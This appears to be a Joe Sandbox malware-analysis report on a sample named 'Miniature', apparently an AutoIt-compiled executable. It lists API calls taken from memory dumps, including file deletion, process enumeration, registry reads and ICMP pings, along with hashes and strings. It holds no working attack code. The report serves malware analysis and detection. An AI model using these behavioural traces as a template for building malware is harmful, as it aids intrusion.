• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                            • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                            • Opcode ID: a6291b2ee163e53966e6fa205692977e0ac049e09e01f479be81c8af248aad45
                                                                                                                                                                                                                                                                                            • Instruction ID: 9fdcf14a17266148ea9d5b6ce1762bc4b1a60c16fde0d1081ebeb5be51f1985b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6291b2ee163e53966e6fa205692977e0ac049e09e01f479be81c8af248aad45
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE5108711083C4AAC701EF609C45FEEBFBD9F86748F000428F592571A2DB649AC9FB22

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C155D1,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C15871
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7EAB0: GetFileAttributesW.KERNEL32(?,00C7D840), ref: 00C7EAB1
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C7DCCB
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7DD1B
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C7DD2C
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7DD43
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7DD4C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 2649000838-1173974218

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7DDAC
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C7DDBA
                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C7DDDA
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7DE87
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00C1EF07
                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00C1F107
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1F228
                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00C1F27B
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C1F289
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1F29F
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C1F2B1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2189390790-0

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C13657
                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00C13681
                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C13692
                                                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00C136AF
                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C136BF
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00C136D5
                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C136E4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                            • Opcode ID: 569c8fe8cc43a5f80c12961bf0a0e7b84cd67e6790ce7e1ab1a5f276c03618b8
                                                                                                                                                                                                                                                                                            • Instruction ID: 14890feb6da309592178dc1e3408822db44d91fe1869293a194e41e471887dae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 569c8fe8cc43a5f80c12961bf0a0e7b84cd67e6790ce7e1ab1a5f276c03618b8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E21E0B1D01358AFDB04DFA4E889BDDBBB8FB09714F00511AF612AB2A0DBB445808F90

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C5071A: CreateFileW.KERNEL32(00000000,00000000,?,00C50A84,?,?,00000000,?,00C50A84,00000000,0000000C), ref: 00C50737
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C50AEF
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C50AF6
                                                                                                                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00C50B02
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C50B0C
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C50B15
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C50B35
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C50C7F
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C50CB1
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C50CB8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                            • Opcode ID: a94cdf245cd7ade9191fd17eea814b1b40171dc67115a3489521e33f323b09c4
                                                                                                                                                                                                                                                                                            • Instruction ID: 3ca464925940012a3309d25da08e6afb8a497de593aeb9d5f85538d2c5b92331
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a94cdf245cd7ade9191fd17eea814b1b40171dc67115a3489521e33f323b09c4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93A14736A102448FCF18AF68D892BAD3BB0AB06325F24015DFC11DF2A2D7319D96DB55

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00C155B2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C1525A
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C153C4
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C54BFD
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C54C3E
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C54C80
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C54CE7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C54CF6
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                            • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                            • Opcode ID: a27064dccb79f9a5d0ba24f5a7d89411838547fb6cd49faa6b6d5e3ce42d2519
                                                                                                                                                                                                                                                                                            • Instruction ID: eb58f5c5d19460ebb235609a0f57850b708b290bf2100898b923f67acdcf56d7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a27064dccb79f9a5d0ba24f5a7d89411838547fb6cd49faa6b6d5e3ce42d2519
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A717E715043819AC704EF65EC85EAEBBE8FF99344F80442DF452871B0DB71AA89EB52

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C134DE
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00C134ED
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00C13503
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00C13515
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00C13527
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C1353F
                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 00C13590
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: GetSysColorBrush.USER32(0000000F), ref: 00C13657
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: RegisterClassExW.USER32(00000030), ref: 00C13681
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C13692
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: InitCommonControlsEx.COMCTL32(?), ref: 00C136AF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C136BF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: LoadIconW.USER32(000000A9), ref: 00C136D5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C136E4
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                            • Opcode ID: aff66964fe946429f6b976efe1344229947d19b68a822d66999af1a86f36da79
                                                                                                                                                                                                                                                                                            • Instruction ID: 270d4f340e90feb174f0ef2a2cc5b5e7798ff84f252f1dc87964ee8fe9ba4e7a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aff66964fe946429f6b976efe1344229947d19b68a822d66999af1a86f36da79
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB213D70D40398ABDB109FA5EC95BAD7FBCFB09754F00001AF606AB2B0C7B905449F90

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00C91019
                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 00C91079
                                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 00C91085
                                                                                                                                                                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00C91093
                                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C91123
                                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C91142
                                                                                                                                                                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00C91216
                                                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 00C9121C
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                            • String ID: Ping
                                                                                                                                                                                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                            • Opcode ID: 0409cc2b09c794ae6dcca43b138736660e0abf4f16522ffe5de32e15a866297d
                                                                                                                                                                                                                                                                                            • Instruction ID: 0bd1a824fc60c6b432d5b2703c20ce38011afea5197ac7ba2f693d96f7d61462
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0409cc2b09c794ae6dcca43b138736660e0abf4f16522ffe5de32e15a866297d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82918471604242AFDB20DF15C889B5ABBE0FF45318F188599F965CB7A2C731ED85CB81

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C13709,?,?), ref: 00C13777
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00C13709,?,?), ref: 00C137A3
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C137C6
                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C13709,?,?), ref: 00C137D1
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00C137E5
                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00C13806
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                            • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                            • Opcode ID: b8ebb6430930105f6f06019d4547483b48c1bfaec0b86a85959dbd5806038eaf
                                                                                                                                                                                                                                                                                            • Instruction ID: 92c908b7129181dc913aa9565a067f381b5c5d778917f4b818acca87bd8cc82c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8ebb6430930105f6f06019d4547483b48c1bfaec0b86a85959dbd5806038eaf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B441E9F52001C4BADB185B289E8ABFD3A6DE703308F004125F9128A5E5CAA49BC5B7A1

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 8f5c602dcba2b9d460464f8b98d3e46a742e3cd32c01ffcaebd37b91c8f80f79
                                                                                                                                                                                                                                                                                            • Instruction ID: 896c9544587eff741a461dd775583637bbd5677f2b3beeed3fdc9c3f6160147d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f5c602dcba2b9d460464f8b98d3e46a742e3cd32c01ffcaebd37b91c8f80f79
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34C1D270D042599FDF11DFE9D845BAEBBB0FF0A310F184159F965AB2A2C7309A42CB61

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                            • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                            • Opcode ID: 7ba8a5bc66df3f1e8c927b630dfe3f22196ca0042c33543e831e854eb5a5709d
                                                                                                                                                                                                                                                                                            • Instruction ID: 2571a402a9c97f61337e509eddf3123f7207754e13b8798c857a2cb61585bb9c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ba8a5bc66df3f1e8c927b630dfe3f22196ca0042c33543e831e854eb5a5709d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4625CB0508341CFC724DF15D095A9ABBE1FF89308F10895EE89A8B352DB71DA49DF92

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1001 c135b3-c13623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C135E1
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13602
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C13368,?), ref: 00C13616
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C13368,?), ref: 00C1361F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                            • Opcode ID: 44bf4de530af9817ef90b281f14f2f190a2f6a31e16835f79d1e752d5eb48ef2
                                                                                                                                                                                                                                                                                            • Instruction ID: c393a22f93ff650f91007060fd6795e74ef29d1ab588038298a00b9758b9dbb2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44bf4de530af9817ef90b281f14f2f190a2f6a31e16835f79d1e752d5eb48ef2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAF03A706402D57AEB3507136C88F3B2EBDD7C7F14B00001EB906AB5B0D6694841EEB0

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C55287
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C16299
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                            • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                            • Opcode ID: c35746e0897f8de696aea5d43ed6731afee24920f90da86250dc8f66a622db8a
                                                                                                                                                                                                                                                                                            • Instruction ID: dd92ef75edc2236099e51542241a335c73bce7e74e6af3078af3b9eaa0cf4cae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c35746e0897f8de696aea5d43ed6731afee24920f90da86250dc8f66a622db8a
